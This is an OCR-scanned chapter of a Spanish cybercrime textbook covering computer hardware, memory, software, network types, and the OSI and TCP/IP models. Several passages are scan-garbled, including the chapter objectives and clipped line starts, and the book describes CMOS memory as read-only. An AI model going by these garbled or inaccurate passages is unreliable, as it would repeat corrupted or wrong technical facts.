8. Un colegio permite que sus estudiantes y profesores utilicen la wi.fi y para ello
les facilita la contraseña. Por la misma wifi se transmiten las señales de las cá-
maras de seguridad, los ficheros que manejan y las descargas de los navega-
dores. Indique si este hecho constituye una vulnerabilidad, amenaza o riesgo.
Valore en qué casos es una medid a acertada y en cuáles no.
9. Un empleado utiliza en su trabajo su portátil en el que tiene instalado un sis-
tema operativo pirata, es decir, no adquirido legalmente. Indique si este hecho
constituye una vulnerabilidad, amenaza o riesgo.
10. Ponga un ejemplo n 1qu pueda asumir un riesgo como aceptable.

- 30 -
Capítulo 2.
Fundamentos de computadores y redes
OBJETIVOS DEL CAPÍTULO
' • ~}! 'F J.f:, • / ~¡ "

cer lo os• n:
c..,,,.
hardware,
·-'t ·:r•·• ,' ,
las · erconec · special, se · ·
. ,_funciones
}~~ c?q}m"'''
ClOSO y SU.S ...

I. FUNDAMENTOSDECOMPUTADORES

l. Algunos conceptos previos

Informática (del francés informatique) es acrónimo de information y


automatique (Infor: información y Mática: automática). Según la RAE, es el
conjunto de conocimientos científicos y técnicas que hacen posible el tra-
tamiento automático de la información por medio de ordenadores. Un or-
denador es una máquina electrónica cuyo objetivo es procesar información
digital, que es aquella que puede expresarse en el sistema binario de nume-
ración (O y 1). Para digitalizar los caracteres del alfabeto y otros símbolos
se asigna a cada uno una combinación de ceros y unos que recibe el nombre
de código. Existen diversos códigos, siendo entre los más populares ASCII y
UTF-8.
En este contexto se entiende por sistema de información a cualquier
dispositivo con este fin en sentido amplio, incluyendo ordenadores, tabletas,
grandes sistemas de computación, móviles, etc.
Un PC (siglas de Personal Computer en inglés) es un ordenador per-
sonal. Existen diversos tipos de ordenadores como son: portátiles o note-
books (integran en un solo elemento todo), de sobremesa (se compone de
pantalla y unidad central) o tipo servidor. Hay muchos dispositivos que
teniendo antes una función concreta han ampliado sus prestaciones has-
ta convertirse en un ordenador: teléfono móvil, reproductor multimedia,
PDA (Personal Digital Assistant), navegadores GPS ( Global Positioning Sys-
tem) y videoconsolas.

- 33 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

El procesamiento de datos consta de las siguientes fases:


l. Entrada. Se introducen los datos necesarios para realizar la tarea. Estos
datos deben estar en formato digital y se pueden introducir de varias formas:
• Desde dispositivos de entrada, como el ratón, el teclado, o un escáner.
• Desde unidades de almacenamiento de datos, como un disco duro,
una unidad óptica ...
• A través de una conexión de red, como una red local o Internet.
2. Proceso. El ordenador procesa los datos de entrada de acuerdo con
las instrucciones del programa que se esté ejecutando en ese momento. El
procesamiento de datos puede consistir en realizar cálculos con ellos o en
transferirlos de un lugar a otro. Esta labor la realiza, fundamentalmente, el
microprocesador, que actúa como Unidad Central de Procesamiento (CPU).
3. Salida. Como consecuencia del procesamiento de los datos por parte
del ordenador se obtiene un resultado, que se denomina datos de salida. Es-
tos datos pueden mostrarse en la pantalla, enviarse a una impresora, almace-
narse en el disco duro, enviarse por una red, etc.
El principio de funcionamiento de cualquier equipo informático se basa
en dos tipos de unidades: una unidad aritmético-lógica (ALU) que suma, mul-
tiplica y compara números a gran velocidad, y una unidad de memoria que
puede almacenar y suministrar muchos miles de números.
Para medir la información digital se utilizan diferentes unidades, según
el tamaño de la información a medir. La unidad elemental es el bit, que corres-
ponde a cada uno de los ceros y unos de que consta una información digital.
Un conjunto formado por 8 bits recibe el nombre de byte. El número 150
se representa en binario mediante 8 bits y, por tanto, también podemos decir
que mide 1 byte.
Además, se utilizan los siguientes múltiplos del byte:
• 1 Kilobyte (KB) = 1.024 bytes (- 1000 bytes) .
• 1 Megabyte (MB) = 1.024 KB = 1.048.576 bytes (- un millón de bytes).
• 1 Gigabyte (GB) = 1.024 MB = 1.048.576 KB = 1.073.741.824 bytes (- mil
millones de bytes).
• 1 Terabyte (TB) = 1.024 GB = 1.048.576 MB = 1.073.741.824 KBytes (- mil
millones deKBytes) = l.099.511.627.776 bytes.
Se denomina hardware a los elementos físicos de los que se compone un
sistema informático, algunos de estos elementos son cables, tarjetas, impreso-
ras. Se denomina software a los elementos lógicos y los programas. La misión

- 34 -
Capitulo 2. FUNDAMENTOS DE COMPU1'ADORl!S YREDES

del hardware es traducir las instrucciones al lenguaje que el ordenador pue-


da entender. El hardware por sí solo no realiza ninguna función, es el software
quien indica las tareas a realizar y permite controlar los dispositivos físicos.

2. Hardware

Los elementos fundamentales desde un punto de vista abstracto de


cualquier sistema de información son la CPU (unidad central de proceso) y
la memoria interna. Todos los demás elementos se consideran externos y se
denominan periféricos. Los elementos de entrada y /o salida de datos (tales
como redes, cámaras, USB, lectores ópticos, CD o DVD, lectores de cinta, video
o casete, ratón, controladores de discos duros o flexibles, lápiz óptico, tecla-
do, terminales, escáneres ... ) son periféricos.
La CPU y la memoria interna se conectan entre sí a través de la placa
base, que es el circuito electrónico más importante del ordenador. También
se conectan a ella los demás componentes del ordenador.
La CPU consta de dos partes fundamentales. La ALU ( unidad aritmético-
lógica) es la encargada de las operaciones aritméticas (suma/resta, multipli-
car /dividir) y de las operaciones lógicas (mayor que, menor que, igual que,
distinto que ... ). La UC (Unidad de Control) es la encargada de la transferencia
de datos entre la memoria interna, la ALU y los periféricos.
Existen distintos tipos de memoria interna, organizada de manera jerár-
quica, con diferentes funciones. Como se ha indicado, el hardware por sí mis-
mo no es capaz de realizar ninguna función, por ello es evidente la necesidad
de algún programa que le indique cómo arrancar y qué hacer a continuación.
Dos memorias son fundamentales en este contexto, ambas consideradas in-
ternas. En primer lugar, la RAM-CMOS (complementary metal-oxide-semicon-
ductor) o también conocida memoria CMOS es una memoria de solo lectura
(ROM, read only memory) que contiene la fecha y la hora, así como otros datos
básicos de la configuración del hardware del ordenador. La BIOS (basic input/
output system) es una memoria ROM que contiene las instrucciones necesa-
rias para arrancar el ordenador y cargar el sistema operativo, que es el soft-
ware que gestiona y controla todos los recursos del hardware del sisstema.
Ej. 2.1: Son ejemplos de sistemas operativos Winclows , Mac OS, UBUNTU,
ros, Android ...

Durante el arranque la BIOS lee los datos que contiene la memoria CMOS
y realiza un chequeo de los dispositivos de hardware. Si todo es correcto, bus-

- 35 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGíA INFORMÁTICA

ca el sistema operativo y lo carga en la memoria interna denominada memo-


ria principal o RAM (Random Access Memory). A partir de ese momento es el
sistema operativo el que toma el control del ordenador.
Las memorias CMOS y BIOS pueden configurarse mediante el Setup
(programa de configuración de la BIOS). A los programas incluidos en este
tipo de memorias se les denomina.firmware.
Una vez arrancado el computador se cargan el resto de los programas en
la memoria RAM. Esta memoria es rápida y volátil, es decir, se borra o se pier-
de su contenido al cesar el suministro eléctrico.
Ej. 2.2: En este contexto es importante conocer también la memoria caché,
porque puede ser objeto de diferentes ataques como la vulnerabilidad Zombi-
Load que afectó a los procesadores de la marca Intel para extraer contraseñas
u otra información. En un principio, la CPU trabajaba directamente con la RAM.
Con el fin de aumentar la rapidez ele computación, se diseñó una estrategia en la
que se interpone una memoria ultrarrápida denominada caché de manera que
las instrucciones de los programas almacenados en la RAM se cargan por blo-
ques en la caché y desde allí se interactúa directamente con la CPU.

Por último, es importante destacar un mecanismo que se utiliza frecuen-


temente y que se denomina memoria virtual. Consiste en utilizar parte del
disco duro (memoria secundaria, lenta) como si fuera memoria RAM (memo-
ria principal, rápida). En el sistema operativo LINUX a la memoria virtual se
le denomina swap. En Windows es el archivo de paginación: pagefile.sys. Am-
bos ficheros suelen ser objetivos de ataque para extraer información y son
usados en el análisis forense.
Todas las demás memorias se denominan secundarias (o también lla-
madas externas). En general son externas a la placa base. Pueden ser electró-
nicas, magnéticas u ópticas. Tienen gran capacidad de almacenamiento, baja
velocidad y conservan datos durante un tiempo indefinido. A este tipo de me-
morias pertenecen los discos duros (HDD, hard disk device), las unidades de
cinta y discos masivos para la realización de copias de seguridad (Back -up),
los discos duros de estado sólido SSD (solid-state device) que son más caros,
pero mucho más rápidos, las memorias.flash como los pendrives o las tarjetas
tipo SD o MMC, Los CDs, DVDs Blu-Ray, etc.
La conexión de los periféricos a la unidad central se realiza a través de
conectores a la placa base que se denominan puertos. Los más conocidos
son los puertos COM para comunicaciones serie que utiliza por ejemplo el
modem, los LPT para comunicaciones paralelo que utilizan las impresoras o
escáneres, el PS/2 para ratón y teclado, el USB (universal serial bus) que se

- 36 -
Capítulo 2. FUNDAMENTOS DE COMPUT YR DES

utilíza para todos los dispositivos, el FIREWIRE (IEEE 1394) que es exclusi-
vo para transferir grandes volúmenes de datos a alta velocidad como los ar-
hivos desde cámaras digitales de vídeo (también se puede transferir con un
puerto USB 3.0), IRDA para infrarrojos, LAN para conectar a red local, WLAN
para conectar a una red local inalámbrica, MIDI para dispositivos multime-
dia de sonido, DVI para la salida digital de video, HDMI para multimedia de
alta definición, PCMCIA y EXPRESS CARD para añadir otros nuevos puertos
en portátiles y E-SATA para conectar discos serie externos.
Entre los periféricos de red, también llamados dispositivos de red, des-
tacan el HUB y el SWITCH que conecta varios ordenadores en una misma red
y el ROUTER que interconecta varias redes.

3. Software

El software puede agruparse en tres grandes ámbitos. En primer lugar,


debe considerarse el software del sistema, conocido generalmente como sis-
tema operativo. El sistema operativo se ejecuta generalmente con amplios
privilegios (derechos de control sobre los recursos del sistema), lo que lo
hace especialmente sensible a un ataque. Gestiona todos los recursos hard-
ware. Tiene dos partes. La primera de ellas se denomina Kernel (núcleo) y se
encarga de los procesos, es decir, de la ejecución de programas. La segunda
son los controladores o drivers que se encargan de la gestión específica de
uno o varios dispositivos.
Ej. 2.3: Ejemplos clásicos de sistemas operativos son el MS-DOS (aparece
en 1981 ) y Windows de Microsoft (con sus numerosas generaciones), UNIX y
sus versiones distribuidas bajo GNU/ LINUX como la distribución UBUNTU, Red
Hat, FreeBSD u OpenBSD, Mac OS (sistema operativo asociado a los equipos
Apple desde los equipos Macintosh). Para móviles los más conocidos son lOS y
ANDROID.
Luego aparece como ejemplo también Solaris como sistema operativo de-
rivado de Unix por la compañía SUN (actualmente Oracle) y diseñado para su
ejecución en servidores ; o HP-UX desarroll ado por Hewlet-Packard para sus
servidores basado también en UNIX.

Una de las principales aplicaciones de los sistemas operativos es la ad-


ministración y gestión de la memoria secundaria a través del sistema de fi-
cheros.
Los datos se organizan en los discos mediante un sistema/árbol de di-
rectorios. Las carpetas o directorios son partes del disco perfectamente de-

- 37 -
Cibercriminalidad.
UNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

identificadas con un nombre y que se crean con la finalidad de


111· r los ficheros o archivos. Cada fichero es un conjunto de información
ntifkada con un nombre, que le asigna el usuario o el sistema, y una exten-
ión (nombre.ext) relacionada con el tipo de datos que contiene.
El segundo ámbito del software es el de programación que es el software
que utilizan los desarrolladores para crear programas y aplicaciones.
El tercer ámbito es el más cercano al usuario, el software de aplicación.
Los más habituales son los paquetes gráficos (programas de diseño asistido
por ordenador, tipo CAD); las suites ofimáticas (tipo Microsoft Office y Li-
bre Office) que suelen contener 4 tipos de programas: procesador de texto,
Word/Writter, hoja d e cálculo, Excel/Calc, base de datos, Access/Base y apli-
caciones de presentación, Power Point/Graph; las herramientas o utilidades,
como r produ tor s y grabadores multimedia, (por ejemplo VLC, para repro-
r 11 ul o sonidos, y, Nero para grabar DVDs ... ); los programas para
imir · h1vo (Winzip, Winrar o 7-zip). Pero entre todo el software de
16 an las herramientas o utilidades relacionadas con Internet,
1 v g dores que sirven para visualizar páginas web, interpretando
ódigo HTML, por ejemplo Google Chrome, Safari (Mac), Internet Expia-
r r, Opera, Mozilla, ... ; las herramientas de gestor de correo, para visualizar el
correo electrónico dentro del propio ordenador, como por ejemplo Outlook
Express; los firewall o cortafuegos, que protegen al ordenador de entradas y
salidas no deseadas, y los antivirus que detectan y eliminan virus.

II. FUNDAMENTOS DE REDES

l. Conceptos básicos

Las redes de computadores fueron inicialmente diseñadas para conectar


máquinas entre sí. Sin embargo, en la actualidad la capacidad para digitalizar
cualquier tipo de información ha ampliado el uso de las redes para conectar
directamente personas y más recientemente objetos cada vez más simples y
de uso cotidiano. Esta evolución ha dado lugar a la Internet de las Cosas (IoT,
Internet ofThings).
Toda comunicación tiene tres elementos; el emisor, el receptor y el canal.
Debe distinguirse entre canal y medio. Un medio es algo físico, mientras que
canal es la abstracción como parte de un medio utilizada en una comunica-
ción. Así, un medio puede soportar múltiples canales. Por ejemplo, en las co-
municaciones inalámbricas un mismo medio físico, el aire, da soporte a múl-

- 38 -
Capítulo 2. FUNDAMENTOS DE COMPUTADO S YREDES

1 s canales de comunicación. Las instalaciones de ADSL o de fibra óptica


rtadas por los operadores telefónicos permiten la recepción de múltiples
n les a través de un mismo medio físico. Además, suelen proporcionar un
,, al exclusivo para el acceso a Internet.
Para que la comunicación sea eficaz, el emisor y el receptor deben en-
nderse. Para ello se establecen los protocolos de comunicación que son un
njunto de reglas y procedimientos que gobiernan la comunicación. Un pro-
ola define la estructura de los mensajes que se intercambian, y como estos
envían y reciben.
En la actualidad, el concepto de red se extiende mucho más allá que a
conexión de computadores, ya que han surgido multitud de dispositivos
que se conectan directamente, tales como teléfonos móviles, reproductores
portátiles de música, impresoras, videoconsolas, televisores inteligentes, ve-
hículos, etc. Todo aquello que esté conectado está en red. La conexión puede
ser mediante un cable o una fibra óptica, pero también mediante conexiJ nes

gitales, redes de telefonía, móvil, etc.


f
Inalámbricas de red como Wifi, Bluetooth, líneas telefónicas analógicas di-
1
Gran parte de los conceptos clásicos que se han desarrollado en el ám-
bito de las redes de computadoras son válidos para las redes de telefonía fija
o móvil, o IoT. En este contexto se utiliza el término redes de comunicaciones
para todo tipo de dispositivos conectados y en todos los entornos, tales como
las redes domóticas (automatización de viviendas), las redes industriales o
las redes de comunicación del automóvil.
Una red es una combinación de hardware y software que envía datos de
un sitio a otro, por medio de un conjunto de dispositivos (nodos) y elementos
auxiliares de conexión interconectados entre sí por un medio físico . El ren-
dimiento de una red es su capacidad para realizar transferencias de infor-
mación. El parámetro más importante del rendimiento es el ancho de banda.
Este parámetro se especifica en número de bits que se transmiten por unidad
de tiempo, normalmente en Megabits por segundo. En el ámbito comercial
se suele omitir el "por segundo", por ejemplo, una fibra óptica de 100 Megas
quiere decir Megabits/s. Este valor es un máximo, ya que otros factores pue-
den reducirlo, como la latencia, que indica los retardos que puede sufrir una
trama (unidad de envío de datos) durante su tránsito a través de la red, nor-
malmente debidos a distintos dispositivos por los que debe pasar el paquete
de datos, como los repetidores, conmutadores, hubs, módems, routers, etc.
Otro parámetro importante es la congestión por tráfico. Todos los dispo-
sitivos de interconexión que participan en la comunicación (módems, encami-

- 39 -
r rlm lnalldad.
SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

n dores (routers), concentradores (hubs), conmutadores (switches) .. .) por los


que tienen que pasar los paquetes de datos tienen una capacidad limitada y si
la concurrencia de comunicaciones en determinado momento es elevada, ello
puede afectar negativamente al rendimiento. En estos casos, los dispositivos de
interconexión reciben los paquetes y los almacenan en una o varias colas para
atenderlos conforme al protocolo de prioridades que tengan implementado.
Otro parámetro importante para caracterizar una red es la fiabilidad
y tiene en cuenta los posibles fallos que se pueden producir. En los ámbitos
profesionales se introducen redundancias para que la red pueda seguir fun-
cionando, aunque se produzca la avería de un dispositivo de la red. La redun-
dancia es importante y suele ser un elemento de seguridad que favorece la
resiliencia de los sistemas en los ataques.
En cuanto a la seguridad de la red se suelen establecer dos niveles: la se-
guridad interna y la seguridad externa. La interna hace referencia a los errores
que se pueden producir por problemas inherentes a la propia red, como ruido,
interferencia, etc. Salvo situaciones graves, la propia red es capaz de resolver este
tipo de problemas sin que el usuario lo perciba. Únicamente en aquellos casos
especialmente graves podrá experimentar una reducción del rendimiento global.
No obstante, cuando se habla de seguridad de la red se hace referencia de manera
generalizada a la seguridad exterior, esto es, frente a elementos externos a la pro-
pia red, considerándose los principios básicos que vimos en el capítulo anterior.
Ej. 2.4: Así, recordemos adaptando estos conceptos al ámbito de las re-
des. la integridad significa que los datos lleguen al destino exactamente igual
que fueron emitidos sin que se hayan producido modificaciones accid entales o
maliciosas y la confidencialidad se refiere a que solo el destinatario autorizado
p"t1eda tener acceso a la información transmitida, mientras que la autenticidad
hace referencia a la necesidad de que ambos extremos de la comunicación pue-
dan estar seguros de que su interlocutor en el extremo opuesto es quien debe
ser y no se trata de un impostor. En una red compartida como Intemet, los pa-
quetes de datos pueden pasar por decenas de redes y servidores hasta alcanzar
el destino final y en cualquier punto podría haber un usuario con interés por
conocer la información transmitida y hacer un uso fraudulento de la misma. Un
ataque común que afectaría a estas tres dimensiones podría ser el del hombre
en medio (man in the middle). Consiste en que un usuario se introduce entre el
destinatario y emisor para espiar y /o manipular la información que se inter-
cambian, sin que ninguno de ellos llegue a saber que el mensaje que reciben no
es el del otro, sino el manipulado y enviado por el que está en medio.

En cuanto al tipo de conexión puede ser punto a punto o multipunto. En


la conexión punto a punto únicamente se comunican dos estaciones, una en

- 40 -
Capitulo 2. FUNDAMENTOS DE COMPUTADO S YREDES

1 la extremo. Por el contrario, en un sistema multipunto hay múltiples esta-


nes que se conectan juntas mediante algún tipo de estrategia de conexión
lo permita, como una topología en bus, estrella, anillo, malla o árbol.
Las redes de comunicación son muy diversas y se pueden clasificar según
IW rentes criterios. El primero viene definido por el protocolo o capa del proto-
lo en la que trabaja. Los protocolos de comunicación se estructuran mediante
pas (se hablará de ellas más adelante), pero no todas las redes implementan
totalidad de las mismas. En función de la capa superior que contemple la red
hablará de una red de capa o nivel de aplicación, o de enlace, o de transporte.
El segundo es el ámbito o escala, que hace referencia a las distancias
ue abarca una misma red sin necesidad de encaminar los paquetes de infor-
mación hacia otra red. Se suelen distinguir LAN (Local Area Network), WAN
( Wide Area Network) o PAN (Personal Area Network), y suelen utilizar una
enología distinta para que se adapte mejor al ámbito correspondiente.
Una LAN es una red de área local o directamente red local. Es el tipo de
redes más cercanas al usuario y su ámbito es un domicilio, una oficina o in-
luso todo un edificio. Son redes de carácter privado y las distancias máximas
entre extremos suele ser inferior a los 2.500 metros, pero normalmente se
suelen dividir en subredes más pequeñas para separar el tráfico de red y au-
mentar el rendimiento global. La red universal y casi exclusiva actualmente
en este ámbito es Ethernet.
Una WAN o red de área extensa tiene un ámbito global que puede abar-
car a todo un país o a todo el planeta. Normalmente se trata de un conjunto de
redes interconectadas entre sí. Suelen ser redes de carácter público y las dis-
tancias pueden ser de decenas de kilómetros. La red telefónica es un ejemplo
de red WAN, al igual que las troncales de Internet. Son muy heterogéneas, uti-
lizando desde el simple par de hilos de cobre de telefonía, como el empleado
en las conexiones ADSL, hasta la fibra óptica de alta capacidad de datos y de
comunicación a larga distancia.
Finalmente, una red PAN o red personal es la de ámbito más reducido y
no va más allá de una habitación, domicilio o vehículo. Es el tipo de red que
se establece para imprimir una fotografía directamente desde una cámara fo-
tográfica, para conectar un ratón inalámbrico o el sistema de manos libres en
un vehículo. La tecnología estándar en este ámbito es Bluetooth.
En algunas ocasiones se pueden encontrar referencias a otros niveles de
red de ámbitos intermedios a los anteriores como MAN (Metropolitan Area
Network) o CAN (Campus Area Network).

- 41 -
Clbercrlmlnalldad .
.,-:.;¡·;¡;¡u,lliNTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

, , : Un j >mplo de MAN podría ser la red de distribución de televisión


•1 1 d sde la central local hasta los distintos domicilios. Un ejemplo de
i\N puede ser las redes de un campus universitario donde se conectan entre sí
todos los edificios de la misma Universidad.

El tercero es la relación funcional de los elementos de la red. Puede ser en-


tre pares (Peer to peer, P2P) o Cliente-Servidor (Client-Server) . En una conexión
entre pares todos los nodos tienen las mismas características funcionales y la re-
lación es perfectamente simétrica. Las redes telefónicas y las redes de comparti-
ción de archivos son redes P2P. Sin embargo, cuando se accede a una página web,
un elemento (el cliente) solicita un servicio y otro lo proporciona (el servidor).
Un cuarto criterio clasificatorio puede ser por la finalidad. La red puede
tener un propósito general o estar dedicada a propósitos específicos corno el
control de procesos industriales, la gestión empresarial, el servicio a cajeros
automáticos, la distribución de contenido, multimedia, etc. De hecho, puede
decirse que hoy en día todo está en red.

2. Protocolo de comunicaciones

Una característica fundamental en las redes es el protocolo de comuni-


cación. Un protocolo es un conjunto de reglas predefinidas con el propósito
de estandarizar el intercambio de información. La elección de un protocolo
concreto determina las posibilidades de conexión de la red, ya que el protoco-
lo debe ser común a todos los elementos de la misma red. Existen numerosos
protocolos (NETBEUI utilizado en las primeras redes de Microsoft, APPLE
TALK desarrollado por Apple Inc. para la interconexión de redes locales, ... )
pero el conjunto de protocolos utilizado más universal es el TCP /IP, aunque
existen otros que se utilizan en redes específicas, corno las redes dornóticas,
industriales, etc. En la actualidad, en el contexto de IoT se pueden encontrar
redes específicas corno BTLE o ZigBee.

2.1. El modelo OSI


Con el fin de gestionar los dispositivos conectados se establecen mode-
los y protocolos. El modelo OSI (Open System Interconnection) fue definido
por la Organización Internacional de Estandarización (ISO) con el fin de es-
tablecer un modelo que permita la comunicación entre distintos sistemas
independientemente de la arquitectura subyacente. Es solo un modelo de
referencia. Es abierto y utilizable por cualquier fabricante o desarrollador y
su objetivo es proporcionar una arquitectura de red flexible, robusta e intero-
perable.

- 42 -
Capítulo 2. FUNDAMENTOS DE COMPUTADORES YREDES

Un modelo no es lo mismo que un protocolo ni que una pila de protoco-


, Es una definición teórica de la estratificación en capas y una descripción
la funcionalidad que debe proporcionar cada una de ellas.
Dentro de un mismo modelo se pueden definir distintos protocolos. Un
delo tiene una naturaleza funcional mientras que el protocolo define re-
s concretas. Cada capa de un modelo comunica con sus adyacentes, supe-
r e inferior, mediante un protocolo, salvo excepciones los protocolos son
feridos a un determinado nivel de comunicaciones. Cada capa de un mode-
stablece un dialogo con la capa análoga del otro extremo de la comunica-
1ón mediante también un protocolo. El conjunto de protocolos de todas las
pas o niveles se denomina una pila de protocolos. De esta manera se puede
hablar de la pila TCP /IP para hacer referencia al conjunto de protocolos con-
t mplados en el modelo TCP /IP que, aunque no es la única alternativa, es el
más extendido por ser el utilizado en Internet.
El modelo OSI estructura el proceso de comunicación en siete niveles o
apas. Cada capa se ocupa de una o varias tareas dentro del proceso total de
la comunicación.
El nivel 1 es la capa física. Es la responsable de la comunicación real me-
diante un medio físico. En ella se definen: el medio físico (cable coaxial, fibra
óptica, infrarrojos, microondas, láser etc.); las características del medio (tipo
de cable, tipo de conectores, tipo de antena, etc.) y la forma final en la que la
información es transmitida (codificación de señal, modulación empleada, etc.)
Ej. 2.6: Cuando, un proveedor de acceso a Internet oferta una conexión de
lOOMbits/s está dando un parámetro definido por la capa física, también inclui-
rá en la oferta si se trata de ADSL, cable coaxial o fibra óptica. En el caso del WIFI
el medio físico es el aire.

El nivel 2 es la capa de enlace y convierte la capa física en un enlace fiable


para que la capa superior (capa de red) vea la comunicación totalmente libre
de errores. Esta es la capa responsable de la comunicación entre los distintos
nodos de una misma red. La primera tarea de esta capa es la partición de la in-
formación a transmitir en paquetes, denominados tramas, para que su trans-
misión resulte más efectiva. Las principales funciones de esta capa son la ges-
tión de los errores que puedan aparecer, el control de flujo de la información y
el control de acceso al medio en el caso de tratarse de un medio compartido.
Finalmente, para que en cada momento se pueda realizar la comunica-
ción de un sistema con otro, y solo con ese, es necesario identificar los distin-
tos nodos de la red. Para ello se define un esquema de direccionamiento deno-

- 43 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

minado dirección física. Distintas redes pueden utilizar distintos sistemas de


direccionamiento físico.
Ej. 2.7: Aunque existen distintas alternativas, la red física más utilizada es
la conocida como Ethernet, definida en el estándar IEEE-802.3 y que ha sufri-
do múltiples añadidos que han ido ampliando su rango de aplicación. El direc-
cionamiento empleado por Ethernet se conoce como dirección MAC (MAC Ad-
dress) y utiliza 48 bits (6 bytes) para identificar a cada uno de los nodos. Estos
bits se escriben como doce cifras hexadecimales agrupadas por parejas y sepa-
radas entre sí por dos puntos. Por ejemplo una dirección MAC o dirección física
de Ethernet sería 00 :90:F3:D9 :A8: 15.
Todas las interfaces de red ( elementos de conexión en un dispositivo) lle-
van almacenada físicamente esa dirección y es única. La utilización de 48 bits
permite un máximo de 2'18 = 281.474.976.710.656 direcciones de interfaz dis-
tintas. Los tres primeros bytes (24 bits, o 6 dígitos en hexadecimal, 00:90:F3 en
el ejemplo) identifican a un fabricante y los otros tres (D9 :A8: 15 en el ejemplo)
los asigna el fabricante a sus productos a modo de número de serie, garantizan-
do que no existen en el mercado dos números iguales y por lo tanto no hay dos
tarjetas de red con la misma dirección física.
La dirección MAC se puede suplantar en un ataque conocido como MAC Spoo-
Jing con el objeto de presentarse en la red como un dispositivo legítimo conocido.

El nivel 3 es la capa de red y es la responsable de la comunicación entre


nodos o estaciones finales. La capa de enlace solo es responsable de la co-
municación dentro de una misma red y la capa de red lo es de la comunica-
ción a través de distintos tipos de redes interconectadas entre sí. Es decir, el
cometido de la capa de red es hacer que los datos lleguen desde el origen al
destino, aun cuando ambos extremos no estén conectados directamente a la
misma red. Los paquetes intercambiados en este nivel se consideran absolu-
tamente independientes, es decir, sin relación entre sí. Esto puede suponer
que los paquetes lleguen a su destino repetidos o en distinto orden a como
se enviaron. Estos problemas serán resueltos por la capa superior: nivel 4 o
capa de transporte. El direccionamiento físico definido en la capa de enlace es
válido únicamente dentro de su red. Para las redes interconectadas, cada una
puede utilizar distintos esquemas de direccionamiento por lo que el direccio-
namiento de capa de enlace no resulta válido para comunicar distintas redes.
Por ejemplo, la red origen es Ethernet y la destino no. Por ello la capa de red
define su propio esquema de direccionamiento denominado direccionamien-
to lógico. Dado que debe interconectar redes su definición debe ser universal
y por lo tanto las direcciones lógicas deben ser únicas a nivel mundial.
El nivel 4 es la capa de transporte y tiene dos tareas fundamentales.
La primera es convertir la capa de red en un enlace fiable. La capa de trans-

- 44 -
Capítulo 2. FUNDAMENTOS DE COMPUTADORES YREDES

del origen trocea la información en paquetes para enviarla y, como


quetes pueden llegar de la capa de red desordenados, o repetidos, los
na en destino para proporcionárselos a las capas superiores de ma-

a segunda tarea fundamental de esta capa es la comunicación entre pro-


o puntos de servicio (coloquialmente aplicaciones). Una misma máquina,
t ndrá una dirección lógica, puede estar ejecutando múltiples procesos inde-
dientes y cada uno de ellos demanda u ofrece un tipo de servicio. La capa de
sporte se encarga de entregar la información al punto de servicio correspon-
nte. Esto requiere identificar los distintos procesos dentro de la máquina para
ue de nuevo se necesita un nivel de direccionamiento. A este direccionamien-
le denomina técnicamente como direccionamiento a punto de servicio y al
r 1más cercano al usuario se le conoce coloquialmente como direccionamiento
puerto. Esto permite establecer distintos tipos de comunicaciones simultáneas
sde una misma máquina, permitiendo por ejemplo utilizar una aplicación de
rreo a la vez que se descarga un fichero y se realiza una videoconferencia utili-
zando aplicaciones y procesos totalmente independientes.
El nivel 5 es la capa de sesión y establece, gestiona, sincroniza y finaliza
las sesiones de comunicación.
El nivel 6 es la capa de presentación y se diferencia de las anteriores en
que está directamente relacionada con la información que se intercambia.
Las capas inferiores no establecían ninguna suposición acerca de los datos
intercambiados, todos son paquetes. Sin embargo, esta capa está relacionada
con la sintaxis y la semántica de la información. En la capa de presentación se
realizan tareas como la compresión y el cifrado de la información y este tipo
de tareas están muy relacionadas con el tipo de información concreto, ya que
no se aplica el mismo algoritmo de compresión a un vídeo que a un fichero de
audio o al contenido de una base de datos.
El nivel 7 es la capa de aplicación. Esta capa es la que interactúa direc-
tamente con el usuario. Aquí se definen infinidad de protocolos, cada uno
orientado a un uso particular y específico. La variedad de protocolos en la
capa de aplicación es enorme ya que cada necesidad de comunicación de alto
nivel presenta unas características específicas muy concretas y eso genera la
necesidad de protocolos específicos. En este nivel es donde trabajan protoco-
los como los empleados para el correo electrónico, las páginas web, la men-
sajería instantánea o la transferencia de ficheros entre muchos otros. Algu-
nos de estos protocolos requieren esquemas de direccionamiento adicional
denominados direcciones específicas. Un claro ejemplo son las direcciones de
correo electrónico o las url de las direcciones web.

- 45 -
Cibercriminalidad.
lm r pnl'te. FUNDAMENTOS DE SEGURlDAD EN TECNOLOGÍA INFORMÁTICA

2.2. El modelo TCP /IP


El modelo OSI es un modelo de referencia que se utiliza corno patrón
para establecer comparativas entre distintos sistemas de red. El modelo OSI
propone un modelo de referencia ideal pero la familia de protocolos TCP /IP
se desarrolló antes que el OSI por lo que los niveles contemplados no coinci-
den totalmente. En el acceso a Internet el modelo utilizado es el TCP /IP. Sin
embargo, aunque TCP /IP es un modelo menos ideal, su utilización corno pro-
tocolo base de Internet le ha proporcionado una relevancia considerable.
TCP /IP establece cuatro capas. Las principales diferencias con OSI se
centran en la flexibilidad de las capas inferiores sobre las que no define pro-
tocolos específicos y el agrupamiento de las tres capas superiores del modelo
OSI (sesión, presentación y aplicación) en una única capa de aplicación que
engloba las funcionalidades de las tres.
En el nivel físico, capa 1, TCP /IP no establece ningún protocolo específico y
soporta todos los protocolos estándar. Esto le proporciona la flexibilidad necesaria
para poder trabajar sobre cualquier tipo de red independientemente del tipo de
m dio mpleado (cable coaxial, par trenzado, fibra, aire ...), con cualquier topología
d r d (bus, estrella, anillo, malla ... ), en cualquier ámbito (LAN o WAN), etc.
En la capa de red, capa 3, se utiliza el protocolo IP (Internet Protocol).
La importancia de este protocolo se pone de manifiesto porque junto con el
protocolo TCP, de la capa de transporte, son los que dan nombre al modelo. El
protocolo IP no garantiza cuándo ni cómo se realizará la entrega de paquetes
de información a la estación destino.
El direccionamiento de la capa de red es el direccionamiento IP, que permite
identificar una estación concreta de manera global y única en todo el mundo.
Cualquier máquina necesita tener una dirección IP para comunicarse di-
rectamente a través de Internet, que debe ser única a nivel global. También
necesita conocer la IP de la máquina de destino. Las direcciones IP en el de-
